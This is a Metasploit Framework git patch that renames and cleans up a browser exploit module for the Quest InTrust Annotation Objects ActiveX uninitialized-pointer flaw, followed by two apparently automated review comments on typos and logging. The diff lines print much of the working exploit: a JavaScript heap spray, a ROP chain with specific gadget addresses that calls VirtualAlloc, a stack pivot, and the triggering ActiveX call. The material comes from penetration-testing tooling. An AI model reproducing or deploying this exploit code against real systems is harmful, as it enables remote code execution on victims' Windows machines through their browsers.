From 0d739a1a51a85d35a543333b46fbd64dfdac33b0 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 12 Apr 2012 01:30:01 -0500 Subject: [PATCH] Module rename. Cleanup whitespace. Fix typos. --- ...ointer_rce.rb => intrust_annotatex_add.rb} | 109 +++++++++--------- 1 file changed, 54 insertions(+), 55 deletions(-) rename modules/exploits/windows/browser/{annotation_objects_uninitialized_pointer_rce.rb => intrust_annotatex_add.rb} (69%) diff --git a/modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb similarity index 69% rename from modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb rename to modules/exploits/windows/browser/intrust_annotatex_add.rb index 05cb4f76ba..ccf6ca7a1b 100644 --- a/modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb +++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb @@ -1,12 +1,8 @@ -## -# $Id$ -## - ### # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' 
@@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super( update_info(info, - 'Name' => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution', + 'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer', 'Description' => %q{ - This module exploits a uninitialized variable vulnerability in the + This module exploits an uninitialized variable vulnerability in the Annotation Objects ActiveX component. The activeX component loads into memory without - opting into ALSR so this module exploits the vulnerability against windows Vista and - Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX - points to part of the rop chain in a heap chunk and the calculated call will hit the - pivot in a seperate heap chunk. This will take some time in the users browser. + opting into ALSR so this module exploits the vulnerability against windows Vista and + Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX + points to part of the ROP chain in a heap chunk and the calculated call will hit the + pivot in a separate heap chunk. This will take some time in the users browser. }, 'License' => MSF_LICENSE, 'Author' => [ - 'rgod ', # initial discovery & poc - 'mr_me ', # msf module + 'rgod ', # initial discovery & poc + 'mr_me ' # msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '80662'], [ 'BID', '52765'], - [ 'URL', 'http://www.exploit-db.com/exploits/18674/'], + [ 'URL', 'http://www.exploit-db.com/exploits/18674/'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'InitialAutoRunScript' => 'migrate -f', + 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => { @@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote end end - print_status("Target selected: #{my_target.name}") if datastore['VERBOSE'] - # Re-generate the payload. return if ((p = regenerate_payload(cli)) == nil) 
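Review bot: The typo fixes in the 'Description' block leave "ALSR" on the new side where "ASLR" is meant, and "windows Vista" and "users browser" are still uncorrected in the same paragraph. Since the commit's stated purpose is fixing typos, the two lines could read `opting into ASLR so this module exploits the vulnerability against Windows Vista and` and `pivot in a separate heap chunk. This will take some time in the user's browser.`. The 'Name' shortening and the trailing-comma cleanup in 'Author', 'References' and 'DefaultOptions' look fine. The initialize body continues past the end of the hunk.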
@@ -141,10 +134,11 @@ class Metasploit3 < Msf::Exploit::Remote memory = new Array(); for (i=0;i<1000;i++){ memory[i] = block+shellcode; } } + function main(){ heapspray(); #{obj_name}.Add(#{my_target.ret},1); - } + } EOS end 
@@ -156,39 +150,39 @@ class Metasploit3 < Msf::Exploit::Remote junk, junk, junk, - 0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot) - ].pack('V*') + 0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot) + ].pack('V*') rop_gadgets << [0x44015CEF].pack('V*') * 140 # padding of retn's rop_gadgets << [ - 0x44015CEF, # retn - 0x44015CEF, # retn - 0x44015CEF, # retn - 0x44015cee, # pop edx ; retn - 0x4401a130, # ptr to &VirtualAlloc() (IAT) - 0x44015ca4, # mov eax,[edx+4] ; retn - 0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14 - junk, # filler (compensate) - 0x440159bb, # pop ebp ; retn - junk, # filler (retn offset compensation) - junk, # filler (retn offset compensation) - junk, # filler (retn offset compensation) - junk, # filler (retn offset compensation) - 0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn) - 0x440012c1, # push esp ; ret 08 - 0x44016264, # pop ebx ; retn - 0x00004000, # 0x00000001-> ebx - 0x44015cc9, # pop edx ; retn - 0x00001000, # 0x00001000-> edx - 0x44017664, # pop ecx ; retn - 0x00000040, # 0x00000040-> ecx - 0x44017bd8, # pop edi ; retn - 0x44017ebe, # retn - 0x4400bf25, # pop eax ; retn - 0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn - 0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c] - 0x90909090, # nops, do not change as it changes the offset + 0x44015CEF, # retn + 0x44015CEF, # retn + 0x44015CEF, # retn + 0x44015cee, # pop edx ; retn + 0x4401a130, # ptr to &VirtualAlloc() (IAT) + 0x44015ca4, # mov eax,[edx+4] ; retn + 0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14 + junk, # filler (compensate) + 0x440159bb, # pop ebp ; retn + junk, # filler (retn offset compensation) + junk, # filler (retn offset compensation) + junk, # filler (retn offset compensation) + junk, # filler (retn offset compensation) + 0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn) + 0x440012c1, # push esp ; ret 08 + 0x44016264, # pop ebx ; retn + 0x00004000, # 0x00000001-> ebx + 
0x44015cc9, # pop edx ; retn + 0x00001000, # 0x00001000-> edx + 0x44017664, # pop ecx ; retn + 0x00000040, # 0x00000040-> ecx + 0x44017bd8, # pop edi ; retn + 0x44017ebe, # retn + 0x4400bf25, # pop eax ; retn + 0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn + 0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c] + 0x90909090, # nops, do not change as it changes the offset 0x90909090, 0x90909090, 0x90909090, @@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote var data = payload; while(data.length < 100000) { data += data; } var onemeg = data.substr(0, 64*1024/2); - for (i=0; i<14; i++) { - onemeg += data.substr(0, 64*1024/2); - } + + for (i=0; i<14; i++) { + onemeg += data.substr(0, 64*1024/2); + } + onemeg += data.substr(0, (64*1024/2)-(38/2)); var block = new Array(); - for (i=0; i<700; i++) { - block[i] = onemeg.substr(0, onemeg.length); - } + + for (i=0; i<700; i++) { + block[i] = onemeg.substr(0, onemeg.length); + } } + function main(){ heapspray(); #{obj_name}.Add(#{my_target.ret},1); @@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote EOF - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + peer = "#{cli.peerhost.ljust(16)} #{self.shortname}" + print_status("#{peer} Sending HTML...") #Remove the extra tabs from content content = content.gsub(/^\t\t/, '')
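Review bot: In the `@@ -245,7 +243,8 @@` hunk the new `peer` assignment uses an explicit `self.shortname` receiver, which Ruby style treats as redundant; `peer = "#{cli.peerhost.ljust(16)} #{shortname}"` reads the same. The new status line also no longer records `cli.peerport`, which the replaced message logged, so console output can no longer be matched to a specific client connection by port; if dropping it is deliberate to keep the `peer` prefix uniform, a one-line comment saying so would spare the next reader the question. The enclosing method starts and ends outside the hunk.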